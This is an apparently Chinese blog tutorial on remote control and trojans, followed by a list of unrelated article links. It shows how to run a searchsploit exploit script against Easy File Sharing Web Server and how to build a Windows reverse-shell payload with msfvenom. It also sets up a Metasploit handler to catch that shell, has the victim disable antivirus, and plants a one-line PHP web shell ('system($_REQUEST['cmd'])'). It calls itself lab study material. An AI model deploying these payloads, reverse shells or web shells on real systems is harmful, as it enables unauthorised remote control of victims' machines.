当前位置: 首页 > news >正文

远程控制与木马攻防揭秘

远程控制课程内容

一、Easy File Sharing Web Server 存在远程溢出

二、Kali中生成被控端

三、在网站中写入一句话木马

一、Easy File Sharing Web Server 存在远程溢出

复现步骤

打开Easy File Sharing Web Server,并开启端口为8000的网站

打开kali扫描对应ip地址

可以看见8000端口开放了Easy File Sharing Web Server http 6.9

说明目标主机已经运行了Easy File Sharing Web Server这个软件

接下来我们用searchsploit查Easy File Sharing

他能给出我们要用那些路径下的那些脚本

这里我们的Easy File Sharing Web Server是7.2版本的,所有我们用对应的脚本39009.py

他会打开目标主机的计算器

这样就完成了

二、Kali中生成被控端

复现步骤

打开kali,用msfvenom生成一个payload.exe

注意这里的被控端是windows系统,如果是安卓系统填android

lhost填你自己的kali的ip地址,lport填一个没被占用的端口就行

最后面的“/home/kali/payload.exe”是payload.exe文件生成时保存的路径,填一个你能找到的路径就好,最好不要放在“/root”路径下,有可能payload文件会取不出来

把生成的payload.exe发给被控端备用

被控端要把杀毒软件关闭,电脑自带的也要关闭

接着打开msfconsole界面

以此输入:

use exploit/multi/handler

set payload generic/shell_reverse_tcp

set lhost 192.168.79.134(输入你自己的IP地址)

set lport 7777(输入你的端口)

注意lhost和lport要和刚刚生成payload文件时的一致

最后输入exploit开始监听

现在被控端打开payload.exe

我们可以看看被控端的磁盘信息

这样就成功了

请不要乱输代码,否则被控端的信息可能会被损坏

输入exit退出

三、在网站中写入一句话木马

复现步骤

右键创建一个新文档,命名为shell.php

打开shell.php,写入一句话木马

<?php system($_REQUEST['cmd']);?>

保存后把shell.php放入“/var/www/html”路径下

开启apache

service apache2 start

现在可以去浏览器验证是否成功了

输入http://192.168.134/shell.php?cmd=ifconfig(IP地址是开启apache的主机的)

可以看到网页成功运行了ifconfig

本文仅用于网络安全学习,严禁用于非法攻击,违规使用后果自负。

http://www.cnnetsun.cn/news/63709.html

相关文章:

  • 小白必看:Windows安装FFmpeg图文详解
  • Leaflet中文文档实战:疫情数据可视化地图开发指南
  • AI如何优化锁相环电路设计?
  • OpenMP入门:零基础写出第一个并行程序
  • AI如何帮你快速掌握Modbus TCP协议开发
  • 3分钟搞定Java环境:Cursor vs 传统方式效率对比
  • 3步快速验证你的Adobe弹窗解决方案
  • 深度学习模型加载实战:解决权重加载失败的5种方法
  • 企业级时间同步方案:国内NTP服务器实战部署
  • AI帮你写Git提交信息:告别手动Commit描述
  • 同城自助KTV预约:JAVA线上系统超给力
  • 用Vue3 inject快速搭建可插拔插件系统
  • 零基础入门:10分钟学会EasyPlayer.js的基本使用
  • Yande引擎入口在企业内部文档搜索中的应用
  • Python多线程编程入门:ThreadPoolExecutor保姆级教程
  • 老旧产线不淘汰,数据孤岛轻松破:EtherNet/IP与DeviceNet协议转换实战
  • WSL更新失败?企业开发环境实战解决方案
  • AI如何优化Python线程池:ThreadPoolExecutor的智能调参
  • AI助力SSH端口配置:一键生成安全连接脚本
  • AI赋能:用VSCode插件智能解析小说内容
  • 1小时搭建模型预测控制原型:快马平台实战
  • 1小时搭建DHT11物联网监控原型
  • Gazebo仿真入门:零基础搭建第一个机器人世界
  • 零基础玩转DHT11:从接线到数据读取全指南
  • 传统网络配置 vs AI辅助:处理10.8.8.8的效率对比
  • 如何用AI自动修复代理连接错误?快马平台实战
  • 传统vsAI:全球项目交付速度提升300%的秘诀
  • 告别手动编写:AI一键生成完整docsify项目
  • 告别手动调色:AI颜色表工具效率对比测试
  • 零基础教程:3分钟实现el-input只能输入数字